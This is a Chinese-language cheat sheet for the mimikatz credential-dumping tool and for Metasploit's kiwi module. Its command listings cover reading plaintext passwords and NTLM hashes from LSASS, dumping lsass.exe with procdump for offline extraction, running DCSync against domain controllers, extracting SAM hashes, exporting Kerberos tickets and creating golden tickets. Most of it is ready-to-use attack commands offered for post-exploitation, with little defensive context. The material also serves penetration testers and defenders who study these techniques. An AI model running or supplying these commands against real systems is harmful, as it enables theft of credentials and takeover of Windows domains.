mimikatz

一、破解hash密码步骤

mimikatz能够直接读取WindowsXP-2012等操作系统的明文密码。

在windows2012以上的系统不能直接获取明文密码了，当可以搭配procdump+mimikatz获取密码。

首先，mimikatz需要管理员权限，所以在使用前务必进行提权

privilege::debug    #首先，需要提升权限以便访问系统的敏感信息(需要已经是root权限才能执行成功)
sekurlsa::logonPasswords     # 读取当前登录用户的明文密码

二、模块

cls：       清屏
standard：  标准模块，基本命令
crypto：    加密相关模块
sekurlsa：  与证书相关的模块
kerberos：  kerberos模块
privilege： 提权相关模块
process：   进程相关模块
serivce：   服务相关模块
lsadump：   LsaDump模块
ts：        终端服务器模块
event：     事件模块
misc：      杂项模块
token：     令牌操作模块
vault：     Windows 、证书模块
minesweeper：Mine Sweeper模块
net：
dpapi：     DPAPI模块（通过API或RAW访问）[数据保护应用程序编程接口]
busylight： BusyLight Module
sysenv：    系统环境值模块
sid：       安全标识符模块
iis：       IIS XML配置模块
rpc：       mimikatz的RPC控制
sr98：      用于SR98设备和T5577目标的RF模块
rdm：       RDM（830AL）器件的射频模块
acr：       ACR模块
version：   查看版本
exit：      退出

三、示例

mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

• msv：这项是账户对应密码的各种加密协议的密文，可以看到有LM、NTLM和SHA1加密的密文
• tspkg,wdigest,kerberos：这个就是账户对应的明文密码了。有的时候这三个对应的也不是全部都是一样的，需要看服务器是什么角色。
• SSP：是最新登录到其他RDP终端的账户和密码

1.模块

<1>sekurlsa模块

sekurlsa::logonpasswords

抓取用户NTLM哈希
sekurlsa::msv

加载dmp文件，并导出其中的明文密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

导出lsass.exe进程中所有的票据
sekurlsa::tickets /export

<2>kerberos模块(获取票据)

列出系统中的票据
kerberos::list
kerberos::tgt

清除系统中的票据
kerberos::purge

导入票据到系统中
kerberos::ptc 票据路径

<3>lsadump模块

(在域控上执行)查看域kevin.com内指定用户root的详细信息，包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root

(在域控上执行)读取所有域用户的哈希
lsadump::lsa /patch

从sam.hive和system.hive文件中获得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive

从本地SAM文件中读取密码哈希
token::elevate
lsadump::sam

<4>wdigest

WDigest协议是在WindowsXP中被引入的,旨在与HTTP协议一起用于身份认证。默认情况下,Microsoft在多个版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中启用了此协议,这意味着纯文本密码存储在LSASS(本地安全授权子系统服务)进程中。 Mimikatz可以与LSASS交互,允许攻击者通过以下命令检索这些凭据。

mimikatz #privilege::debug
mimikatz #sekurlsa::wdigest

<5>获取高版本Windows系统的密码凭证

使用procdump将lsass dump下来（需要管理员权限）

procdump.exe -accepteula -ma lsass.exe 1.dmp

使用mimikatz读取密码

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

原文链接：https://blog.csdn.net/weixin_40412037/article/details/113348310

四、MSF中的mimikatz

msf的meterpreter后渗透模块自带了mimikatz，可以直接加载查看明文密码

meterpreter>load kiwi
		   help kiwi  #查看帮助
		   creds_all  #获取系统中的明文密码
		   kikiwi_cmd sekurlsa::logonpasswords  #kiwi_cmd可以使用mimikatz中的所有功能，命令需要接上mimikatz的命令

1.kiwi模块命令

creds_all：列举所有凭据
creds_kerberos：列举所有kerberos凭据
creds_msv：列举所有msv凭据
creds_ssp：列举所有ssp凭据
creds_tspkg：列举所有tspkg凭据
creds_wdigest：列举所有wdigest凭据
dcsync：通过DCSync检索用户帐户信息
dcsync_ntlm：通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create：创建黄金票据
kerberos_ticket_list：列举kerberos票据
kerberos_ticket_purge：清除kerberos票据
kerberos_ticket_use：使用kerberos票据
kiwi_cmd：执行mimikatz的命令，后面接mimikatz.exe的命令
lsa_dump_sam：dump出lsa的SAM
lsa_dump_secrets：dump出lsa的密文
password_change：修改密码
wifi_list：列出当前用户的wifi配置文件
wifi_list_shared：列出共享wifi配置文件/编码